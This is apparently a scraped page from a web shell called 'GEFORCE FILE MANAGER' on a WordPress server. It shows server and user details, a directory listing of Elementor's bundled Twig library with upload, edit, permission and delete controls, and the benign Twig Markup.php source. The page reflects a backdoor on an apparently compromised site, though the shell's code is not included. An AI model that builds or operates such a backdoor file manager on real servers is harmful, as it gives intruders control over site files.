[ SYSTEM ]: Linux wordpress 6.1.0-41-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.158-1 (2025-11-09) x86_64
[ SERVER ]: Apache/2.4.66 (Debian) | PHP: 8.2.30
[ USER ]: www-data | IP: 172.19.30.54
GEFORCE FILE MANAGER
/
var
/
www
/
html
/
wordpress
/
wp-content
/
plugins
/
elementor
/
vendor_prefixed
/
twig
/
twig
/
twig
/
src
/
UPLOAD:
NAME
SIZE
QUICK PERMS
ACTIONS
📁 Attribute
SET
[ DEL ]
📁 Cache
SET
[ DEL ]
📁 Error
SET
[ DEL ]
📁 Extension
SET
[ DEL ]
📁 Loader
SET
[ DEL ]
📁 Node
SET
[ DEL ]
📁 NodeVisitor
SET
[ DEL ]
📁 Profiler
SET
[ DEL ]
📁 Resources
SET
[ DEL ]
📁 Runtime
SET
[ DEL ]
📁 RuntimeLoader
SET
[ DEL ]
📁 Sandbox
SET
[ DEL ]
📁 Test
SET
[ DEL ]
📁 TokenParser
SET
[ DEL ]
📁 Util
SET
[ DEL ]
📄 Markup.php
949 B
SET
[ EDIT ]
|
[ DEL ]
📄 Template.php
15,246 B
SET
[ EDIT ]
|
[ DEL ]
📄 TwigTest.php
2,460 B
SET
[ EDIT ]
|
[ DEL ]
DELETE SELECTED
[ CLOSE ]
EDIT: Markup.php
<?php /* * This file is part of Twig. * * (c) Fabien Potencier * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace ElementorDeps\Twig; /** * Marks a content as safe. * * @author Fabien Potencier <fabien@symfony.com> */ class Markup implements \Countable, \JsonSerializable { private $content; private $charset; public function __construct($content, $charset) { $this->content = (string) $content; $this->charset = $charset; } public function __toString() { return $this->content; } /** * @return int */ #[\ReturnTypeWillChange] public function count() { return \mb_strlen($this->content, $this->charset); } /** * @return mixed */ #[\ReturnTypeWillChange] public function jsonSerialize() { return $this->content; } }